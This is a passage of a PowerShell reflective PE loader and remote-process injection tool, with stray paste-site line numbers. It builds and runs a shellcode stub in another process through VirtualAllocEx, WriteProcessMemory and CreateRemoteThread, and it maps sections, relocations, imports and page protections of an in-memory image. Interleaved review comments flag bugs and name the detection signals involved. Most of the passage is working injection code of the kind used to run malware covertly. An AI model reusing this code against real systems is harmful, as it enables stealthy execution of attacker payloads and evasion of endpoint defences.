        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])

        [IntPtr]$RFuncNamePtr = [IntPtr]::Zero

        if (-not $LoadByOrdinal)
        {
            # By name: the NUL-terminated name must exist in the target, so copy it
            # there first (length + 1 for the terminator).
            $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)

            $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
            $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
            if ($RFuncNamePtr -eq [IntPtr]::Zero)
            {
                Throw "Unable to allocate memory in the remote process"
            }

            # NOTE(review): both error messages below talk about a "DLL path";
            # they were copied from Import-DllInRemoteProcess and actually refer
            # to the function name buffer.
            [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
            if ($Success -eq $false)
            {
                Throw "Unable to write DLL path to remote process memory"
            }
            if ($FunctionNameSize -ne $NumBytesWritten)
            {
                Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
            }
        }

        else
        {
            # By ordinal: GetProcAddress takes the ordinal in the name argument, so
            # the value is handed to the stub as-is and nothing is copied.
            $RFuncNamePtr = $FunctionNamePtr
        }

        # Resolved locally and used remotely; assumes kernel32 shares its base
        # across both processes (same assumption as Import-DllInRemoteProcess).
        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
        $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress")

        # Remote slot the stub stores GetProcAddress's result into.
        # NOTE(review): the size is cast [UInt64][UInt64] here, whereas every other
        # VirtualAllocEx call in this script passes [UIntPtr][UInt64]; this relies
        # on PowerShell's argument conversion to the delegate's parameter type.
        $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
        if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
        {
            Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
        }

        # Fixed opcode runs of the stub, per bitness. The four pointer-sized
        # values spliced between them below are, in order: the remote module
        # handle, the name/ordinal argument, the GetProcAddress address, and the
        # remote return slot. ($GetProcAddressSC itself is assigned but never used.)
        [Byte[]]$GetProcAddressSC = @()
        if ($PEInfo.PE64Bit -eq $true)
        {
            $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
            $GetProcAddressSC2 = @(0x48, 0xba)
            $GetProcAddressSC3 = @(0x48, 0xb8)
            $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
            $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
        }
        else
        {
            $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
            $GetProcAddressSC2 = @(0xb9)
            $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
            $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
            $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
        }
        # Assemble locally, advancing $SCPSMem piece by piece; $SCPSMemOriginal
        # keeps the start for the copy. NOTE(review): never FreeHGlobal'd.
        $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
        $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
        $SCPSMemOriginal = $SCPSMem

        Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
        Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)

        # RWX allocation in the target for the stub, then copy it over.
        $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
        if ($RSCAddr -eq [IntPtr]::Zero)
        {
            Throw "Unable to allocate memory in the remote process for shellcode"
        }
        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
        if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
        {
            Throw "Unable to write shellcode to remote process memory."
        }

        # Run the stub; any non-zero wait result (including the 20 s timeout) is
        # a failure. NOTE(review): the thread handle is never closed.
        $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
        $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
        if ($Result -ne 0)
        {
            Throw "Call to CreateRemoteThread to call GetProcAddress failed."
        }

        # Read the result slot back. $NumBytesWritten is reused here to receive
        # the bytes-read count. NOTE(review): $ReturnValMem is never freed.
        [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
        $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
        if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
        {
            Throw "Call to ReadProcessMemory failed"
        }
        [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])

        # Release the remote regions; the name buffer exists only in the by-name path.
        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null

        if (-not $LoadByOrdinal)
        {
            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
        }

        return $ProcAddress
    }
  1409.  
  1410.  
    Function Copy-Sections
    {
        <#
        .SYNOPSIS
        Maps each PE section from the raw file bytes into the image laid out at
        $PEInfo.PEHandle, zero-filling any part of the virtual size not backed by
        raw data.

        .DESCRIPTION
        Walks the section table starting at $PEInfo.SectionHeaderPtr. For each
        section the copy length is the header's SizeOfRawData, forced to 0 when
        PointerToRawData is 0 and clamped to VirtualSize; the destination range is
        validated with Test-MemoryRangeValid before the copy and before the memset.

        .PARAMETER PEBytes
        Raw bytes of the PE file (source of the section data).

        .PARAMETER PEInfo
        Object from Get-PEDetailedInfo (IMAGE_NT_HEADERS, SectionHeaderPtr, PEHandle).

        .PARAMETER Win32Functions
        Object holding the native delegates; only memset is used here.

        .PARAMETER Win32Types
        Object carrying the IMAGE_SECTION_HEADER struct type.

        .OUTPUTS
        None; writes into the memory at $PEInfo.PEHandle.
        #>
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [Byte[]]
        $PEBytes,

        [Parameter(Position = 1, Mandatory = $true)]
        [System.Object]
        $PEInfo,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Functions,

        [Parameter(Position = 3, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
        {
            # Section headers are contiguous, so header i is at base + i * sizeof.
            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)

            # Destination is the section's RVA relative to the mapped image base.
            [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))

            # Effective number of raw bytes to copy: none if the section has no
            # file-backed data, and never more than its virtual size.
            $SizeOfRawData = $SectionHeader.SizeOfRawData

            if ($SectionHeader.PointerToRawData -eq 0)
            {
                $SizeOfRawData = 0
            }

            if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
            {
                $SizeOfRawData = $SectionHeader.VirtualSize
            }

            # Only the destination range is checked here; bounds on the source
            # side (PointerToRawData + size vs. $PEBytes.Length) are left to
            # Marshal.Copy's own argument checking.
            if ($SizeOfRawData -gt 0)
            {
                Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
                [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
            }

            # Zero-fill the tail of the section that has no raw data behind it.
            # NOTE(review): this condition tests the header's original
            # SizeOfRawData, while $Difference uses the clamped value. A section
            # with PointerToRawData == 0 but SizeOfRawData >= VirtualSize is
            # therefore neither copied nor zeroed.
            if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
            {
                $Difference = $SectionHeader.VirtualSize - $SizeOfRawData
                [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
                Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
                $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
            }
        }
    }
  1471.  
  1472.  
    Function Update-MemoryAddresses
    {
        <#
        .SYNOPSIS
        Applies the PE base relocations so the image works at
        $PEInfo.EffectivePEHandle instead of its preferred $OriginalImageBase.

        .DESCRIPTION
        Computes the unsigned delta between the effective base and the original
        base (and whether it is to be added or subtracted), then walks the
        IMAGE_BASE_RELOCATION blocks at the relocation directory's RVA, patching
        every HIGHLOW or DIR64 entry in place. Returns early when the image is
        already at its preferred base or has no relocation directory.

        .PARAMETER PEInfo
        Object with PEHandle (where the headers/sections were written),
        EffectivePEHandle (the base the image will run at) and IMAGE_NT_HEADERS.

        .PARAMETER OriginalImageBase
        The ImageBase the PE was linked for.

        .PARAMETER Win32Constants
        Object carrying the IMAGE_REL_BASED_* values.

        .PARAMETER Win32Types
        Object carrying the IMAGE_BASE_RELOCATION struct type.

        .OUTPUTS
        None; patches memory in place. Throws on an unrecognised relocation type.
        #>
        Param(
        [Parameter(Position = 0, Mandatory = $true)]
        [System.Object]
        $PEInfo,

        [Parameter(Position = 1, Mandatory = $true)]
        [Int64]
        $OriginalImageBase,

        [Parameter(Position = 2, Mandatory = $true)]
        [System.Object]
        $Win32Constants,

        [Parameter(Position = 3, Mandatory = $true)]
        [System.Object]
        $Win32Types
        )

        [Int64]$BaseDifference = 0
        $AddDifference = $true
        [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)

        # Nothing to do if the image landed at its preferred base or has no
        # relocation table at all.
        if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
                -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
        {
            return
        }

        # The delta is kept as a positive magnitude plus a direction flag so the
        # arithmetic can go through the unsigned helpers (Compare-/Sub-/Add-...,
        # defined elsewhere in the script) without signed-overflow surprises.
        elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
        {
            $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
            $AddDifference = $false
        }
        elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
        {
            $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
        }

        # The relocation directory is read from the local copy at PEHandle (not
        # EffectivePEHandle), i.e. the patches are applied to the local buffer.
        # NOTE(review): the walk stops only on a zero SizeOfBlock; it is not
        # bounded by BaseRelocationTable.Size, so a directory without a zero
        # terminator would be read past its end.
        [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
        while($true)
        {

            $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)

            if ($BaseRelocationTable.SizeOfBlock -eq 0)
            {
                break
            }

            # Each block: a header followed by 16-bit entries; the page base for
            # the block's entries is PEHandle + block VirtualAddress.
            [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
            $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2

            for($i = 0; $i -lt $NumRelocations; $i++)
            {

                $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
                [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])

                # Entry layout: low 12 bits = offset within the page, high 4 bits
                # = relocation type. The type is brought down to 0..15 by twelve
                # halvings instead of a shift operator.
                [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
                [UInt16]$RelocType = $RelocationInfo -band 0xF000
                for ($j = 0; $j -lt 12; $j++)
                {
                    $RelocType = [Math]::Floor($RelocType / 2)
                }

                # HIGHLOW and DIR64 are both handled with a pointer-sized
                # read/modify/write ([IntPtr]). On a 64-bit host that touches
                # 8 bytes even for a HIGHLOW (32-bit) entry — presumably safe
                # because the script only loads images matching the host bitness;
                # TODO confirm.
                if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
                        -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
                {

                    [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
                    [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])

                    if ($AddDifference -eq $true)
                    {
                        [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
                    }
                    else
                    {
                        [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
                    }

                    [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
                }
                # ABSOLUTE entries are padding and are skipped; anything else is
                # an unsupported relocation type and aborts the load.
                elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)
                {

                    Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo"
                }
            }

            # Advance to the next block by this block's total size.
            $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))
        }
    }
  1576.  
  1577.  
  1578.     Function Import-DllImports
  1579.     {
  1580.         Param(
  1581.         [Parameter(Position = 0, Mandatory = $true)]
  1582.         [System.Object]
  1583.         $PEInfo,
  1584.  
  1585.         [Parameter(Position = 1, Mandatory = $true)]
  1586.         [System.Object]
  1587.         $Win32Functions,
  1588.  
  1589.         [Parameter(Position = 2, Mandatory = $true)]
  1590.         [System.Object]
  1591.         $Win32Types,
  1592.  
  1593.         [Parameter(Position = 3, Mandatory = $true)]
  1594.         [System.Object]
  1595.         $Win32Constants,
  1596.  
  1597.         [Parameter(Position = 4, Mandatory = $false)]
  1598.         [IntPtr]
  1599.         $RemoteProcHandle
  1600.         )
  1601.  
  1602.         $RemoteLoading = $false
  1603.         if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)
  1604.         {
  1605.             $RemoteLoading = $true
  1606.         }
  1607.  
  1608.         if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
  1609.         {
  1610.             [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
  1611.  
  1612.             while ($true)
  1613.             {
  1614.                 $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
  1615.  
  1616.  
  1617.                 if ($ImportDescriptor.Characteristics -eq 0 `
  1618.                         -and $ImportDescriptor.FirstThunk -eq 0 `
  1619.                         -and $ImportDescriptor.ForwarderChain -eq 0 `
  1620.                         -and $ImportDescriptor.Name -eq 0 `
  1621.                         -and $ImportDescriptor.TimeDateStamp -eq 0)
  1622.                 {
  1623.                     Write-Verbose "Done importing DLL imports"
  1624.                     break
  1625.                 }
  1626.  
  1627.                 $ImportDllHandle = [IntPtr]::Zero
  1628.                 $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))
  1629.                 $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
  1630.  
  1631.                 if ($RemoteLoading -eq $true)
  1632.                 {
  1633.                     $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr
  1634.                 }
  1635.                 else
  1636.                 {
  1637.                     $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)
  1638.                 }
  1639.  
  1640.                 if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))
  1641.                 {
  1642.                     throw "Error importing DLL, DLLName: $ImportDllPath"
  1643.                 }
  1644.  
  1645.  
  1646.                 [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)
  1647.                 [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics)
  1648.                 [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
  1649.  
  1650.                 while ($OriginalThunkRefVal -ne [IntPtr]::Zero)
  1651.                 {
  1652.                     $LoadByOrdinal = $false
  1653.                     [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero
  1654.  
  1655.  
  1656.  
  1657.                     [IntPtr]$NewThunkRef = [IntPtr]::Zero
  1658.                     if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)
  1659.                     {
  1660.                         [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff
  1661.                         $LoadByOrdinal = $true
  1662.                     }
  1663.                     elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0)
  1664.                     {
  1665.                         [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff
  1666.                         $LoadByOrdinal = $true
  1667.                     }
  1668.                     else
  1669.                     {
  1670.                         [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)
  1671.                         $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))
  1672.                         $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)
  1673.                         $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName)
  1674.                     }
  1675.  
  1676.                     if ($RemoteLoading -eq $true)
  1677.                     {
  1678.                         [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal
  1679.                     }
  1680.                     else
  1681.                     {
  1682.                         [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)
  1683.                     }
  1684.  
  1685.                     if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)
  1686.                     {
  1687.                         if ($LoadByOrdinal)
  1688.                         {
  1689.                             Throw "New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath"
  1690.                         }
  1691.                         else
  1692.                         {
  1693.                             Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath"
  1694.                         }
  1695.                     }
  1696.  
  1697.                     [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)
  1698.  
  1699.                     $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
  1700.                     [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))
  1701.                     [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])
  1702.  
  1703.  
  1704.  
  1705.                     if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero))
  1706.                     {
  1707.                         [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr)
  1708.                         $ProcedureNamePtr = [IntPtr]::Zero
  1709.                     }
  1710.                 }
  1711.  
  1712.                 $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
  1713.             }
  1714.         }
  1715.     }
  1716.  
  1717.     Function Get-VirtualProtectValue
  1718.     {
            # Maps a PE section's IMAGE_SCN_MEM_* characteristics to the PAGE_*
            # protection constant that Update-MemoryProtectionFlags passes to
            # VirtualProtect for that section.
            # Globals:   $Win32Constants (read). It is not a parameter here; it is
            #            resolved from the enclosing scope via PowerShell scoping.
            # Arguments: $SectionCharacteristics - the section header Characteristics
            #            bit field
            # Returns:   a PAGE_* value; PAGE_NOCACHE is OR'ed in when the section is
            #            flagged IMAGE_SCN_MEM_NOT_CACHED
            # NOTE(review): a section marked execute+read+write is mapped to
            # PAGE_EXECUTE_READWRITE. Writable-and-executable private memory is a
            # standard memory-scanner / EDR indicator, which is the detection angle
            # for images mapped this way rather than by the OS loader.
  1719.         Param(
  1720.         [Parameter(Position = 0, Mandatory = $true)]
  1721.         [UInt32]
  1722.         $SectionCharacteristics
  1723.         )
  1724.  
  1725.         $ProtectionFlag = 0x0
                # Executable sections: choose among the four PAGE_EXECUTE_* variants
                # by the READ/WRITE bits.
  1726.         if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
  1727.         {
  1728.             if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
  1729.             {
  1730.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1731.                 {
  1732.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
  1733.                 }
  1734.                 else
  1735.                 {
  1736.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
  1737.                 }
  1738.             }
  1739.             else
  1740.             {
  1741.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1742.                 {
  1743.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
  1744.                 }
  1745.                 else
  1746.                 {
  1747.                     $ProtectionFlag = $Win32Constants.PAGE_EXECUTE
  1748.                 }
  1749.             }
  1750.         }
                # Non-executable sections: same READ/WRITE decision tree, data
                # protections only.
  1751.         else
  1752.         {
  1753.             if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
  1754.             {
  1755.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1756.                 {
  1757.                     $ProtectionFlag = $Win32Constants.PAGE_READWRITE
  1758.                 }
  1759.                 else
  1760.                 {
  1761.                     $ProtectionFlag = $Win32Constants.PAGE_READONLY
  1762.                 }
  1763.             }
  1764.             else
  1765.             {
  1766.                 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
  1767.                 {
  1768.                     $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
  1769.                 }
  1770.                 else
  1771.                 {
  1772.                     $ProtectionFlag = $Win32Constants.PAGE_NOACCESS
  1773.                 }
  1774.             }
  1775.         }
  1776.  
                # Cache-disable is an independent modifier bit, so it is OR'ed on top.
  1777.         if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
  1778.         {
  1779.             $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
  1780.         }
  1781.  
  1782.         return $ProtectionFlag
  1783.     }
  1784.  
  1785.     Function Update-MemoryProtectionFlags
  1786.     {
            # Walks every section header of the in-memory image and applies the
            # protection derived from the section's Characteristics (via
            # Get-VirtualProtectValue) to the section's pages with VirtualProtect.
            # Arguments: $PEInfo         - parsed PE info; reads .PEHandle,
            #                              .SectionHeaderPtr and
            #                              .IMAGE_NT_HEADERS.FileHeader.NumberOfSections
            #            $Win32Functions - delegate table; only .VirtualProtect is used
            #            $Win32Constants - not referenced directly in this body;
            #                              Get-VirtualProtectValue picks it up from
            #                              this scope
            #            $Win32Types     - provides IMAGE_SECTION_HEADER for SizeOf /
            #                              PtrToStructure
            # Throws:    when VirtualProtect reports failure for any section
            # NOTE(review): this is the "write image, then flip pages to executable"
            # step. A VirtualProtect to an executable protection on a region that was
            # allocated as PAGE_READWRITE and then written is the sequence
            # user-mode hooks and ETW-based detections key on for manual mapping.
  1787.         Param(
  1788.         [Parameter(Position = 0, Mandatory = $true)]
  1789.         [System.Object]
  1790.         $PEInfo,
  1791.  
  1792.         [Parameter(Position = 1, Mandatory = $true)]
  1793.         [System.Object]
  1794.         $Win32Functions,
  1795.  
  1796.         [Parameter(Position = 2, Mandatory = $true)]
  1797.         [System.Object]
  1798.         $Win32Constants,
  1799.  
  1800.         [Parameter(Position = 3, Mandatory = $true)]
  1801.         [System.Object]
  1802.         $Win32Types
  1803.         )
  1804.  
  1805.         for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
  1806.         {
                    # i-th section header = SectionHeaderPtr + i * sizeof(IMAGE_SECTION_HEADER)
